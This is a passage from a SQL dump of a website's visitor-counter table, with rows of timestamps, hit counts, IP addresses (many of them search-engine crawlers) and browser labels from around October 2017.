6.13.38','other'),(162927,1506923093,2,2,0,0,'5.45.207.9','other'),(162928,1506923243,1,1,0,0,'51.255.65.82','other'),(162929,1506923327,1,1,0,0,'91.196.177.46','firefox'),(162930,1506923589,1,1,0,0,'180.76.15.147','other'),(162931,1506923708,1,1,0,0,'37.9.113.87','other'),(162932,1506923916,1,1,0,0,'188.163.16.6','chrome'),(162933,1506924533,4,4,0,0,'5.45.207.9','other'),(162934,1506925583,1,1,0,0,'178.154.171.26','other'),(162935,1506925669,1,1,0,0,'157.55.39.224','other'),(162936,1506925719,1,1,0,0,'91.196.177.46','firefox'),(162937,1506925950,1,0,1,0,'66.249.64.8',''),(162938,1506926057,1,1,0,0,'91.196.177.15','chrome'),(162939,1506926071,1,0,1,0,'66.249.70.25',''),(162940,1506926178,1,1,0,0,'207.46.13.140','other'),(162941,1506926289,1,1,0,0,'66.249.70.27','chrome'),(162942,1506926317,2,2,0,0,'5.45.207.9','other'),(162943,1506926370,1,1,0,0,'217.182.132.184','other'),(162944,1506926511,1,1,0,0,'217.182.132.153','other'),(162945,1506926766,1,0,1,0,'68.180.230.153',''),(162946,1506926787,1,1,0,0,'137.74.207.161','other'),(162947,1506926848,2,2,0,0,'178.154.171.75','other'),(162948,1506926952,1,1,0,0,'157.55.39.224','other'),(162949,1506926976,1,1,0,0,'91.196.178.65','chrome'),(162950,1506927349,1,1,0,0,'51.255.65.50','other'),(162951,1506927588,1,1,0,0,'217.182.132.64','other'),(162952,1506927866,1,1,0,0,'91.196.177.15','chrome'),(162953,1506927893,1,1,0,0,'51.255.65.2','other'),(162954,1506927970,1,1,0,0,'217.69.133.5','other'),(162955,1506928039,1,1,0,0,'217.182.132.88','other'),(162956,1506928153,1,1,0,0,'91.209.11.236','other'),(162957,1506928249,1,1,0,0,'51.255.65.27','other'),(162958,1506928370,1,1,0,0,'217.69.133.217','other'),(162959,1506928422,2,2,0,0,'5.45.207.9','other'),(162960,1506928620,1,1,0,0,'51.255.71.101','other'),(162961,1506928839,1,1,0,0,'195.10.210.70','firefox'),(162962,1506928879,1,1,0,0,'51.255.65.19','other'),(162963,1506928964,1,1,0,0,'91.196.178.168','chrome'),(162964,1506929934,1,1,0,0,'217.182.132.96','other'),(162965,1506930000,1,1,0,0,'8.29.198.27','other'),(162966,1506930216,1,1,0,0,'217.182.132.86','other'),(162967,1506930306,1,1,0,0,'5.45.207.64','other'),(162968,1506930481,82,82,0,0,'23.237.4.26','firefox'),(162969,1506930575,1,1,0,0,'51.255.65.38','other'),(162970,1506930869,1,1,0,0,'91.196.177.15','chrome'),(162971,1506931159,1,1,0,0,'217.182.132.82','other'),(162972,1506931357,1,1,0,0,'5.45.207.9','other'),(162973,1506931692,2,2,0,0,'95.213.141.126','opera'),(162974,1506931856,1,1,0,0,'5.45.207.64','other'),(162975,1506931885,2,2,0,0,'216.244.66.237','other'),(162976,1506931899,1,1,0,0,'217.182.132.173','other'),(162977,1506931908,1,1,0,0,'217.182.132.178','other'),(162978,1506932619,2,2,0,0,'178.238.229.94','other'),(162979,1506932738,1,1,0,0,'217.182.132.186','other'),(162980,1506933005,1,1,0,0,'137.74.207.120','other'),(162981,1506933250,1,1,0,0,'66.249.70.29','chrome'),(162982,1506933565,1,1,0,0,'91.209.11.236','other'),(162983,1506933755,1,1,0,0,'137.74.207.161','other'),(162984,1506933764,1,1,0,0,'217.69.133.6','other'),(162985,1506933807,1,1,0,0,'5.45.207.64','other'),(162986,1506933904,1,1,0,0,'51.255.65.7','other'),(162987,1506934241,1,1,0,0,'91.196.178.72','chrome'),(162988,1506934520,1,1,0,0,'178.95.66.130','firefox'),(162989,1506934669,1,1,0,0,'91.196.178.68','chrome'),(162990,1506934801,1,1,0,0,'207.46.13.140','other'),(162991,1506935285,1,1,0,0,'217.182.132.191','other'),(162992,1506935374,1,1,0,0,'91.209.11.236','other'),(162993,1506935453,1,1,0,0,'5.45.207.64','other'),(162994,1506935510,1,1,0,0,'137.74.207.119','other'),(162995,1506935669,2,0,2,0,'66.249.70.27',''),(162996,1506935914,1,1,0,0,'5.45.207.74','other'),(162997,1506936084,1,1,0,0,'51.255.65.87','other'),(162998,1506936136,1,1,0,0,'91.196.178.72','firefox'),(162999,1506936693,1,1,0,0,'95.132.6.87','chrome'),(163000,1506936841,2,2,0,0,'54.165.59.7','other'),(163001,1506937811,1,1,0,0,'54.165.59.7','other'),(163002,1506938930,1,1,0,0,'207.46.13.140','other'),(163003,1506939212,1,1,0,0,'51.255.71.110','other'),(163004,1506939247,1,1,0,0,'51.255.65.82','other'),(163005,1506939838,1,1,0,0,'217.182.132.31','other'),(163006,1506940066,1,1,0,0,'37.55.56.236','chrome'),(163007,1506940145,1,0,1,0,'66.249.70.27',''),(163008,1506940209,1,1,0,0,'141.8.183.38','other'),(163009,1506940297,1,1,0,0,'66.249.70.29','chrome'),(163010,1506940302,1,1,0,0,'91.196.178.72','chrome'),(163011,1506940429,1,1,0,0,'91.196.178.135','firefox'),(163012,1506940594,1,1,0,0,'5.45.207.64','other'),(163013,1506940655,1,1,0,0,'66.249.64.30','chrome'),(163014,1506940817,1,1,0,0,'51.255.65.39','other'),(163015,1506940838,1,1,0,0,'8.29.198.25','other'),(163016,1506940949,3,3,0,0,'5.45.207.9','other'),(163017,1506941478,1,1,0,0,'91.196.178.66','firefox'),(163018,1506941611,1,1,0,0,'51.255.65.25','other'),(163019,1506941766,2,2,0,0,'5.45.207.64','other'),(163020,1506941769,1,1,0,0,'164.132.162.187','other'),(163021,1506941867,1,1,0,0,'217.69.133.224','other'),(163022,1506942240,1,1,0,0,'51.255.65.17','other'),(163023,1506942515,1,1,0,0,'217.182.132.71','other'),(163024,1506942854,1,1,0,0,'217.182.132.85','other'),(163025,1506942963,1,1,0,0,'108.59.8.70','other'),(163026,1506943113,1,1,0,0,'51.255.65.48','other'),(163027,1506943278,1,1,0,0,'91.196.177.46','chrome'),(163028,1506943498,1,1,0,0,'51.255.65.71','other'),(163029,1506943619,2,2,0,0,'91.209.11.236','other'),(163030,1506943655,1,1,0,0,'91.196.177.79','chrome'),(163031,1506943871,1,0,1,0,'66.249.64.28',''),(163032,1506943922,1,1,0,0,'217.182.132.23','other'),(163033,1506944484,1,1,0,0,'51.255.65.64','other'),(163034,1506944539,1,1,0,0,'51.255.71.113','other'),(163035,1506944742,1,1,0,0,'5.45.207.64','other'),(163036,1506944890,1,0,1,0,'66.249.64.28',''),(163037,1506945529,1,1,0,0,'217.182.132.187','other'),(163038,1506945818,1,1,0,0,'91.196.178.72','chrome'),(163039,1506945941,1,1,0,0,'217.182.132.97','other'),(163040,1506945962,1,1,0,0,'51.255.65.39','other'),(163041,1506946003,1,1,0,0,'137.74.207.108','other'),(163042,1506946799,2,2,0,0,'5.45.207.64','other'),(163043,1506946897,1,1,0,0,'91.196.178.72','chrome'),(163044,1506947061,1,1,0,0,'217.182.132.170','other'),(163045,1506947410,1,0,1,0,'66.249.70.29',''),(163046,1506947832,1,1,0,0,'51.255.71.120','other'),(163047,1506948001,1,1,0,0,'91.209.11.236','other'),(163048,1506948238,1,1,0,0,'217.182.132.153','other'),(163049,1506948550,1,1,0,0,'217.182.132.25','other'),(163050,1506949086,1,1,0,0,'217.182.132.175','other'),(163051,1506949320,1,1,0,0,'51.255.71.98','other'),(163052,1506949406,1,0,1,0,'66.249.64.28',''),(163053,1506950011,1,0,1,0,'66.249.64.29',''),(163054,1506950301,1,1,0,0,'91.209.11.236','other'),(163055,1506950360,1,1,0,0,'107.167.104.123','opera'),(163056,1506950377,1,1,0,0,'164.132.162.158','other'),(163057,1506950949,1,1,0,0,'216.244.66.237','other'),(163058,1506951144,2,2,0,0,'5.45.207.9','other'),(163059,1506951147,1,1,0,0,'178.95.243.222','chrome'),(163060,1506951152,1,1,0,0,'217.182.132.91','other'),(163061,1506951210,1,1,0,0,'164.132.162.155','other'),(163062,1506951257,1,1,0,0,'217.182.132.185','other'),(163063,1506951477,1,1,0,0,'66.249.70.25','chrome'),(163064,1506951483,1,1,0,0,'66.249.64.29','chrome'),(163065,1506951517,1,1,0,0,'37.55.56.236','chrome'),(163066,1506951610,1,1,0,0,'66.102.9.25','chrome'),(163067,1506951630,1,1,0,0,'5.45.207.64','other'),(163068,1506951673,1,1,0,0,'8.29.198.27','other'),(163069,1506951693,1,1,0,0,'51.255.65.13','other'),(163070,1506952050,1,1,0,0,'217.69.133.4','other'),(163071,1506952137,1,1,0,0,'217.182.132.151','other'),(163072,1506952310,1,1,0,0,'91.196.178.72','chrome'),(163073,1506953032,1,1,0,0,'51.255.65.61','other'),(163074,1506953567,1,0,1,0,'66.249.70.25',''),(163075,1506953920,1,1,0,0,'94.45.145.5','chrome'),(163076,1506954445,1,1,0,0,'5.45.207.9','other'),(163077,1506954804,1,1,0,0,'217.182.132.184','other'),(163078,1506955085,1,0,1,0,'68.180.229.52',''),(163079,1506955247,1,1,0,0,'107.167.104.123','opera'),(163080,1506955699,1,1,0,0,'91.196.178.168','chrome'),(163081,1506956234,1,1,0,0,'217.182.132.32','other'),(163082,1506956667,1,0,1,0,'66.249.64.28',''),(163083,1506956969,1,1,0,0,'176.193.116.38','msie'),(163084,1506957073,1,1,0,0,'66.249.64.29','chrome'),(163085,1506957288,1,1,0,0,'51.255.65.24','other'),(163086,1506957364,1,0,1,0,'68.180.230.153',''),(163087,1506957434,1,1,0,0,'51.255.65.14','other'),(163088,1506957594,1,1,0,0,'95.108.213.20','other'),(163089,1506957669,1,1,0,0,'5.45.207.64','other'),(163090,1506958053,1,1,0,0,'217.182.132.173','other'),(163091,1506958567,1,1,0,0,'51.255.65.17','other'),(163092,1506958569,1,1,0,0,'66.249.70.25','chrome'),(163093,1506958662,1,1,0,0,'217.182.132.60','other'),(163094,1506958968,1,1,0,0,'217.182.132.149','other'),(163095,1506959769,1,1,0,0,'5.45.207.9','other'),(163096,1506960628,1,1,0,0,'157.55.39.94','other'),(163097,1506960705,1,1,0,0,'91.196.178.66','firefox'),(163098,1506960744,1,1,0,0,'164.132.162.157','other'),(163099,1506960985,1,1,0,0,'5.45.207.9','other'),(163100,1506961080,1,1,0,0,'51.255.65.89','other'),(163101,1506961204,1,1,0,0,'51.255.65.92','other'),(163102,1506961341,1,1,0,0,'51.255.71.130','other'),(163103,1506961622,1,0,1,0,'66.249.64.30',''),(163104,1506962230,1,1,0,0,'51.255.65.76','other'),(163105,1506962327,1,1,0,0,'180.76.15.152','other'),(163106,1506962437,1,1,0,0,'207.46.13.111','other'),(163107,1506962507,1,1,0,0,'8.29.198.27','other'),(163108,1506962840,1,1,0,0,'51.255.65.48','other'),(163109,1506963066,1,1,0,0,'217.182.132.192','other'),(163110,1506963139,1,0,1,0,'66.249.64.30',''),(163111,1506963514,1,1,0,0,'178.154.171.75','other'),(163112,1506964073,1,1,0,0,'5.45.207.9','other'),(163113,1506964341,1,1,0,0,'217.182.132.155','other'),(163114,1506964379,1,1,0,0,'54.165.59.7','other'),(163115,1506964554,1,1,0,0,'51.255.65.82','other'),(163116,1506964714,1,1,0,0,'51.255.71.131','other'),(163117,1506966142,1,1,0,0,'91.196.178.130','chrome'),(163118,1506966327,1,1,0,0,'180.76.15.21','other'),(163119,1506966339,1,1,0,0,'94.178.110.136','firefox'),(163120,1506966405,1,0,1,0,'66.249.70.27',''),(163121,1506966674,1,1,0,0,'66.249.70.25','chrome'),(163122,1506966800,1,1,0,0,'217.182.132.80','other'),(163123,1506967019,1,1,0,0,'5.45.207.9','other'),(163124,1506967501,1,1,0,0,'217.182.132.170','other'),(163125,1506967652,1,1,0,0,'157.55.39.94','other'),(163126,1506967876,1,1,0,0,'51.255.71.125','other'),(163127,1506968153,1,1,0,0,'178.154.171.75','other'),(163128,1506968532,1,1,0,0,'217.69.133.3','other'),(163129,1506968804,1,1,0,0,'217.182.132.68','other'),(163130,1506969137,1,1,0,0,'217.182.132.87','other'),(163131,1506969354,1,1,0,0,'37.73.201.251','chrome'),(163132,1506969934,1,1,0,0,'91.209.11.236','other'),(163133,1506970301,1,1,0,0,'157.55.39.229','other'),(163134,1506970722,2,2,0,0,'5.45.207.64','other'),(163135,1506971246,1,0,1,0,'68.180.230.153',''),(163136,1506971874,1,1,0,0,'37.9.113.87','other'),(163137,1506972019,1,1,0,0,'51.255.71.129','other'),(163138,1506972050,1,1,0,0,'51.255.65.97','other'),(163139,1506972225,1,1,0,0,'51.255.65.44','other'),(163140,1506972464,1,1,0,0,'66.249.64.15','chrome'),(163141,1506972933,1,1,0,0,'51.255.71.129','other'),(163142,1506973104,2,2,0,0,'91.209.11.236','other'),(163143,1506973167,1,0,1,0,'68.180.229.52',''),(163144,1506973349,1,1,0,0,'8.29.198.25','other'),(163145,1506973808,1,1,0,0,'217.182.132.18','other'),(163146,1506973898,1,1,0,0,'216.244.66.237','other'),(163147,1506974146,1,1,0,0,'66.249.70.27','chrome'),(163148,1506974265,1,1,0,0,'151.80.27.116','other'),(163149,1506974657,1,1,0,0,'51.255.65.27','other'),(163150,1506975175,1,1,0,0,'217.182.132.79','other'),(163151,1506975354,1,1,0,0,'217.182.132.67','other'),(163152,1506976231,1,1,0,0,'157.55.39.235','other'),(163153,1506976332,1,1,0,0,'207.46.13.122','other'),(163154,1506976381,1,1,0,0,'180.76.15.138','other'),(163155,1506977436,1,1,0,0,'51.255.71.126','other'),(163156,1506977694,1,1,0,0,'217.182.132.28','other'),(163157,1506977745,1,1,0,0,'5.45.207.9','other'),(163158,1506978206,1,1,0,0,'5.45.207.64','other'),(163159,1506978212,1,1,0,0,'51.255.65.80','other'),(163160,1506978275,1,1,0,0,'216.244.66.237','other'),(163161,1506978386,2,2,0,0,'54.165.59.7','other'),(163162,1506978488,1,1,0,0,'51.255.65.29','other'),(163163,1506978578,1,1,0,0,'217.182.132.70','other'),(163164,1506978599,1,1,0,0,'66.249.64.30','chrome'),(163165,1506979162,1,1,0,0,'91.209.11.236','other'),(163166,1506979180,1,1,0,0,'217.182.132.153','other'),(163167,1506979989,1,1,0,0,'51.255.65.38','other'),(163168,1506980412,1,1,0,0,'139.227.144.102','msie'),(163169,1506980684,1,1,0,0,'95.220.93.90','msie'),(163170,1506980939,1,1,0,0,'217.182.132.173','other'),(163171,1506980984,1,1,0,0,'5.45.207.64','other'),(163172,1506981137,1,0,1,0,'68.180.229.52',''),(163173,1506981299,1,1,0,0,'51.255.65.14','other'),(163174,1506981573,1,0,1,0,'68.180.230.153',''),(163175,1506981726,1,1,0,0,'217.182.132.76','other'),(163176,1506981873,1,1,0,0,'217.182.132.6','other'),(163177,1506981919,1,1,0,0,'217.182.132.193','other'),(163178,1506981963,1,1,0,0,'51.255.71.121','other'),(163179,1506982367,1,1,0,0,'217.69.133.203','other'),(163180,1506982404,1,1,0,0,'51.255.65.12','other'),(163181,1506982525,1,1,0,0,'5.45.207.64','other'),(163182,1506982740,1,1,0,0,'51.255.71.125','other'),(163183,1506982768,1,1,0,0,'5.45.207.9','other'),(163184,1506983024,1,1,0,0,'178.154.171.75','other'),(163185,1506983261,1,1,0,0,'51.255.71.126','other'),(163186,1506983275,1,1,0,0,'217.182.132.151','other'),(163187,1506983685,1,1,0,0,'51.255.65.28','other'),(163188,1506983755,1,1,0,0,'217.182.132.175','other'),(163189,1506983785,1,1,0,0,'157.55.39.85','other'),(163190,1506984199,1,1,0,0,'8.29.198.26','other'),(163191,1506984961,1,0,1,0,'68.180.229.52',''),(163192,1506985335,1,1,0,0,'217.182.132.77','other'),(163193,1506985404,2,2,0,0,'5.45.207.64','other'),(163194,1506985973,1,1,0,0,'137.74.207.188','other'),(163195,1506986331,1,0,1,0,'66.249.64.30',''),(163196,1506986740,1,1,0,0,'178.154.171.75','other'),(163197,1506987088,1,1,0,0,'5.45.207.64','other'),(163198,1506987267,1,1,0,0,'217.182.132.183','other'),(163199,1506987300,2,0,2,0,'68.180.230.153',''),(163200,1506987628,1,1,0,0,'176.213.245.219','chrome'),(163201,1506988977,1,1,0,0,'51.255.71.98','other'),(163202,1506989171,1,1,0,0,'217.182.132.30','other'),(163203,1506989505,1,0,1,0,'66.249.64.30',''),(163204,1506989915,1,1,0,0,'46.161.9.55','firefox'),(163205,1506990023,2,2,0,0,'51.255.65.10','other'),(163206,1506990606,1,1,0,0,'217.182.132.147','other'),(163207,1506991509,1,1,0,0,'176.31.231.10','other'),(163208,1506992343,1,1,0,0,'217.69.133.4','other'),(163209,1506992787,1,1,0,0,'51.255.65.66','other'),(163210,1506992897,1,0,1,0,'66.249.64.28',''),(163211,1506992929,1,1,0,0,'216.244.66.237','other'),(163212,1506993497,1,1,0,0,'5.45.207.64','other'),(163213,1506993850,1,0,1,0,'66.249.70.25',''),(163214,1506993962,1,1,0,0,'137.74.207.159','other'),(163215,1506994460,1,1,0,0,'217.182.132.186','other'),(163216,1506994837,1,1,0,0,'217.182.132.23','other'),(163217,1506995041,1,1,0,0,'8.29.198.26','other'),(163218,1506995124,1,1,0,0,'217.182.132.181','other'),(163219,1506995302,1,1,0,0,'51.255.65.50','other'),(163220,1506995346,1,1,0,0,'217.182.132.33','other'),(163221,1506995921,1,1,0,0,'137.74.207.119','other'),(163222,1506996322,1,0,1,0,'66.249.70.27',''),(163223,1506996782,1,1,0,0,'91.209.11.236','other'),(163224,1506996834,1,1,0,0,'37.9.113.72','other'),(163225,1506996884,1,1,0,0,'217.69.133.5','other'),(163226,1506997473,1,0,1,0,'66.249.64.30',''),(163227,1506997590,1,1,0,0,'217.182.132.82','other'),(163228,1506997852,1,1,0,0,'173.212.238.134','other'),(163229,1506997911,1,1,0,0,'216.244.66.237','other'),(163230,1506998442,1,1,0,0,'5.45.207.64','other'),(163231,1506998964,1,1,0,0,'217.182.132.87','other'),(163232,1506999432,1,1,0,0,'5.45.207.64','other'),(163233,1506999528,1,1,0,0,'66.249.70.27','chrome'),(163234,1506999587,1,1,0,0,'51.255.65.87','other'),(163235,1506999935,1,1,0,0,'51.255.71.114','other'),(163236,1507000517,1,1,0,0,'216.244.66.237','other'),(163237,1507001277,1,1,0,0,'198.204.243.138','other'),(163238,1507001756,1,0,1,0,'68.180.230.153',''),(163239,1507001848,1,1,0,0,'178.154.171.75','other'),(163240,1507002440,1,1,0,0,'51.255.65.17','other'),(163241,1507003035,1,1,0,0,'51.255.71.122','other'),(163242,1507003442,1,1,0,0,'66.249.70.29','chrome'),(163243,1507003495,1,1,0,0,'66.249.64.30','chrome'),(163244,1507003526,1,1,0,0,'216.244.66.237','other'),(163245,1507003768,1,1,0,0,'217.182.132.240','other'),(163246,1507004074,1,1,0,0,'217.182.132.84','other'),(163247,1507004688,1,1,0,0,'51.255.65.16','other'),(163248,1507004712,2,2,0,0,'5.45.207.64','other'),(163249,1507005186,1,1,0,0,'217.69.133.194','other'),(163250,1507005484,1,1,0,0,'51.255.65.9','other'),(163251,1507005534,1,1,0,0,'217.182.132.183','other'),(163252,1507005880,1,1,0,0,'8.29.198.25','other'),(163253,1507005989,1,1,0,0,'91.196.177.46','firefox'),(163254,1507006073,1,1,0,0,'216.244.66.237','other'),(163255,1507006671,1,1,0,0,'151.80.27.116','other'),(163256,1507006827,2,2,0,0,'5.45.207.64','other'),(163257,1507006878,1,1,0,0,'217.182.132.81','other'),(163258,1507007002,1,0,1,0,'68.180.230.153',''),(163259,1507007436,1,1,0,0,'137.74.207.116','other'),(163260,1507007698,1,1,0,0,'157.55.39.140','other'),(163261,1507007789,1,1,0,0,'51.255.65.58','other'),(163262,1507007903,1,1,0,0,'180.76.15.157','other'),(163263,1507008164,1,1,0,0,'217.69.133.2','other'),(163264,1507008686,1,1,0,0,'217.182.132.94','other'),(163265,1507009520,1,0,1,0,'68.180.230.153',''),(163266,1507009693,1,1,0,0,'137.74.207.101','other'),(163267,1507010959,1,1,0,0,'51.255.65.52','other'),(163268,1507011570,2,0,2,0,'66.249.70.25',''),(163269,1507011697,1,1,0,0,'51.255.71.121','other'),(163270,1507011968,1,1,0,0,'91.196.178.68','chrome'),(163271,1507012058,1,1,0,0,'51.255.65.50','other'),(163272,1507012628,1,0,1,0,'68.180.229.52',''),(163273,1507012966,1,1,0,0,'91.196.178.68','chrome'),(163274,1507013083,1,1,0,0,'51.255.64.106','other'),(163275,1507013185,1,1,0,0,'51.255.65.82','other'),(163276,1507013230,1,1,0,0,'178.154.171.75','other'),(163277,1507013257,1,1,0,0,'216.244.66.237','other'),(163278,1507013742,1,1,0,0,'51.255.65.28','other'),(163279,1507013951,1,1,0,0,'51.255.65.84','other'),(163280,1507014014,1,1,0,0,'217.182.132.97','other'),(163281,1507014031,1,1,0,0,'5.45.207.64','other'),(163282,1507014269,1,1,0,0,'91.196.178.72','chrome'),(163283,1507014312,1,1,0,0,'195.10.210.70','firefox'),(163284,1507015197,1,1,0,0,'5.45.207.64','other'),(163285,1507015234,1,0,1,0,'68.180.229.52',''),(163286,1507015412,1,0,1,0,'66.249.64.29',''),(163287,1507015653,2,2,0,0,'5.45.207.9','other'),(163288,1507015706,2,2,0,0,'178.154.171.75','other'),(163289,1507015864,1,1,0,0,'91.196.178.68','chrome'),(163290,1507016161,1,0,1,0,'68.180.230.153',''),(163291,1507016163,1,1,0,0,'51.255.65.76','other'),(163292,1507016427,1,1,0,0,'217.69.133.9','other'),(163293,1507016723,1,1,0,0,'8.29.198.27','other'),(163294,1507016893,1,1,0,0,'46.200.75.98','chrome'),(163295,1507017125,1,1,0,0,'51.255.65.93','other'),(163296,1507017957,1,1,0,0,'95.132.135.24','chrome'),(163297,1507018032,2,2,0,0,'103.212.223.146','msie'),(163298,1507018163,1,1,0,0,'51.255.65.58','other'),(163299,1507018233,1,1,0,0,'217.182.132.148','other'),(163300,1507019219,1,0,1,0,'66.249.70.25',''),(163301,1507019257,1,1,0,0,'51.255.65.60','other'),(163302,1507019314,1,1,0,0,'91.196.178.68','chrome'),(163303,1507019727,1,1,0,0,'217.182.132.152','other'),(163304,1507019734,1,1,0,0,'51.255.65.75','other'),(163305,1507019880,1,1,0,0,'217.182.132.37','other'),(163306,1507020511,1,0,1,0,'68.180.229.52',''),(163307,1507020685,1,0,1,0,'66.249.64.30',''),(163308,1507020981,1,1,0,0,'92.113.21.38','chrome'),(163309,1507021252,1,1,0,0,'217.182.132.58','other'),(163310,1507021307,1,1,0,0,'217.182.132.88','other'),(163311,1507021658,1,1,0,0,'217.182.132.57','other'),(163312,1507021982,1,1,0,0,'40.77.167.135','other'),(163313,1507022125,1,1,0,0,'51.255.65.48','other'),(163314,1507022178,1,1,0,0,'180.76.15.160','other'),(163315,1507022360,1,1,0,0,'91.196.178.66','chrome'),(163316,1507022512,1,1,0,0,'51.255.71.116','other'),(163317,1507022840,1,1,0,0,'137.74.207.108','other'),(163318,1507022848,1,1,0,0,'5.45.207.64','other'),(163319,1507022849,1,1,0,0,'91.209.11.236','other'),(163320,1507022861,1,1,0,0,'217.182.132.67','other'),(163321,1507023350,1,1,0,0,'51.255.65.92','other'),(163322,1507023390,1,0,1,0,'68.180.229.52',''),(163323,1507023428,1,1,0,0,'51.255.65.85','other'),(163324,1507023470,1,1,0,0,'51.255.65.23','other'),(163325,1507023664,1,1,0,0,'157.55.39.205','other'),(163326,1507023716,1,1,0,0,'5.45.207.9','other'),(163327,1507024138,1,1,0,0,'95.132.123.242','firefox'),(163328,1507024164,1,0,1,0,'68.180.230.153',''),(163329,1507024582,1,1,0,0,'164.132.162.188','other'),(163330,1507024645,1,1,0,0,'217.182.132.20','other'),(163331,1507024711,1,1,0,0,'5.45.207.9','other'),(163332,1507025156,1,1,0,0,'217.182.132.183','other'),(163333,1507025588,1,1,0,0,'5.45.207.64','other'),(163334,1507025755,1,0,1,0,'68.180.229.52',''),(163335,1507026766,1,1,0,0,'51.255.71.114','other'),(163336,1507026819,1,1,0,0,'162.210.196.130','other'),(163337,1507027156,1,1,0,0,'217.182.132.33','other'),(163338,1507027172,1,1,0,0,'66.249.64.29','chrome'),(163339,1507027178,1,1,0,0,'66.249.70.25','chrome'),(163340,1507027445,1,1,0,0,'37.235.131.131','firefox'),(163341,1507027456,1,1,0,0,'217.182.132.65','other'),(163342,1507027566,1,1,0,0,'8.29.198.27','other'),(163343,1507027710,1,1,0,0,'92.113.21.38','chrome'),(163344,1507028189,3,3,0,0,'88.198.67.69','other'),(163345,1507028405,1,1,0,0,'37.73.229.68','chrome'),(163346,1507028478,1,0,1,0,'68.180.230.153',''),(163347,1507028803,1,1,0,0,'217.182.132.155','other'),(163348,1507029263,1,1,0,0,'217.182.132.34','other'),(163349,1507029353,1,0,1,0,'66.249.64.28',''),(163350,1507029471,1,1,0,0,'51.255.65.72','other'),(163351,1507029656,1,0,1,0,'66.249.64.30',''),(163352,1507030388,1,1,0,0,'91.196.178.66','chrome'),(163353,1507030760,1,0,1,0,'66.249.64.29',''),(163354,1507030908,1,0,1,0,'68.180.229.52',''),(163355,1507031558,1,1,0,0,'66.249.64.30','chrome'),(163356,1507031906,1,1,0,0,'5.45.207.9','other'),(163357,1507032125,1,1,0,0,'51.255.65.77','other'),(163358,1507032150,1,1,0,0,'217.69.133.9','other'),(163359,1507032313,1,1,0,0,'91.196.178.68','chrome'),(163360,1507032316,1,1,0,0,'217.182.132.178','other'),(163361,1507032351,1,1,0,0,'217.69.133.2','other'),(163362,1507032385,1,1,0,0,'31.43.10.3','chrome'),(163363,1507032498,1,0,1,0,'66.249.70.25',''),(163364,1507032544,1,1,0,0,'51.255.65.69','other'),(163365,1507032870,1,1,0,0,'51.255.65.48','other'),(163366,1507033053,1,0,1,0,'66.249.70.27',''),(163367,1507033262,1,1,0,0,'51.255.65.6','other'),(163368,1507033322,1,1,0,0,'91.209.11.236','other'),(163369,1507033462,1,0,1,0,'66.249.64.29',''),(163370,1507033574,1,1,0,0,'51.255.65.97','other'),(163371,1507034703,1,1,0,0,'217.182.132.84','other'),(163372,1507034748,1,1,0,0,'217.182.132.32','other'),(163373,1507034785,1,1,0,0,'37.52.120.220','chrome'),(163374,1507035218,1,1,0,0,'217.182.132.193','other'),(163375,1507035421,1,1,0,0,'178.154.171.75','other'),(163376,1507035484,2,2,0,0,'5.45.207.64','other'),(163377,1507035506,1,1,0,0,'37.235.131.131','firefox'),(163378,1507035568,1,1,0,0,'51.255.65.5','other'),(163379,1507035605,1,1,0,0,'91.196.178.65','chrome');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (163380,1507035702,1,1,0,0,'137.74.207.161','other'),(163381,1507035731,1,1,0,0,'51.255.71.100','other'),(163382,1507035883,1,1,0,0,'51.255.65.4','other'),(163383,1507036027,1,0,1,0,'66.249.64.28',''),(163384,1507036367,1,1,0,0,'217.182.132.67','other'),(163385,1507036583,1,1,0,0,'178.92.251.139','chrome'),(163386,1507037991,1,1,0,0,'217.182.132.146','other'),(163387,1507038023,1,1,0,0,'217.69.133.194','other'),(163388,1507038397,1,1,0,0,'8.29.198.27','other'),(163389,1507038433,2,2,0,0,'185.137.17.99','chrome'),(163390,1507038893,1,1,0,0,'141.8.142.14','other'),(163391,1507039435,1,1,0,0,'91.196.178.168','chrome'),(163392,1507039553,1,1,0,0,'5.45.207.64','other'),(163393,1507039569,1,1,0,0,'217.69.133.3','other'),(163394,1507039643,1,1,0,0,'5.45.207.9','other'),(163395,1507039710,1,1,0,0,'91.196.179.33','firefox'),(163396,1507039811,1,1,0,0,'66.249.70.27','chrome'),(163397,1507039924,1,1,0,0,'217.182.132.60','other'),(163398,1507039976,1,1,0,0,'91.196.177.46','firefox'),(163399,1507040076,1,0,1,0,'66.249.70.25',''),(163400,1507040518,1,1,0,0,'217.182.132.148','other'),(163401,1507041281,1,1,0,0,'51.255.65.31','other'),(163402,1507041752,1,1,0,0,'51.255.65.46','other'),(163403,1507042121,1,0,1,0,'68.180.229.52',''),(163404,1507042134,1,1,0,0,'66.249.64.28','chrome'),(163405,1507042151,1,0,1,0,'66.249.70.25',''),(163406,1507042301,1,1,0,0,'213.108.45.138','chrome'),(163407,1507042538,1,1,0,0,'51.255.65.4','other'),(163408,1507042590,1,1,0,0,'31.43.10.3','other'),(163409,1507042593,1,1,0,0,'31.43.10.3','msie'),(163410,1507042597,1,1,0,0,'31.43.10.3','chrome'),(163411,1507042599,2,0,2,0,'68.180.230.153',''),(163412,1507042665,2,2,0,0,'54.165.59.7','other'),(163413,1507042814,3,3,0,0,'95.158.189.118','other'),(163414,1507043336,1,1,0,0,'217.182.132.30','other'),(163415,1507043443,1,1,0,0,'164.132.162.158','other'),(163416,1507043521,1,1,0,0,'51.255.65.73','other'),(163417,1507044466,1,1,0,0,'91.196.178.136','chrome'),(163418,1507045264,1,1,0,0,'141.8.142.74','other'),(163419,1507045314,1,1,0,0,'217.69.133.9','other'),(163420,1507045615,1,1,0,0,'37.9.113.182','other'),(163421,1507046093,1,1,0,0,'217.182.132.151','other'),(163422,1507046216,1,1,0,0,'217.182.132.170','other'),(163423,1507046995,1,1,0,0,'217.182.132.185','other'),(163424,1507047567,1,1,0,0,'141.8.132.19','other'),(163425,1507047871,1,1,0,0,'164.132.162.156','other'),(163426,1507048032,1,1,0,0,'217.69.133.3','other'),(163427,1507048041,1,1,0,0,'217.182.132.81','other'),(163428,1507048051,1,1,0,0,'178.154.171.88','other'),(163429,1507048065,1,0,1,0,'68.180.230.153',''),(163430,1507048248,1,1,0,0,'217.182.132.57','other'),(163431,1507049233,1,1,0,0,'8.29.198.27','other'),(163432,1507049854,1,1,0,0,'91.196.178.66','firefox'),(163433,1507050217,2,2,0,0,'178.154.171.88','other'),(163434,1507050319,1,1,0,0,'40.77.167.13','other'),(163435,1507050343,2,2,0,0,'217.69.133.217','other'),(163436,1507050649,1,1,0,0,'141.8.142.74','other'),(163437,1507050903,1,1,0,0,'51.255.65.59','other'),(163438,1507051648,1,1,0,0,'217.182.13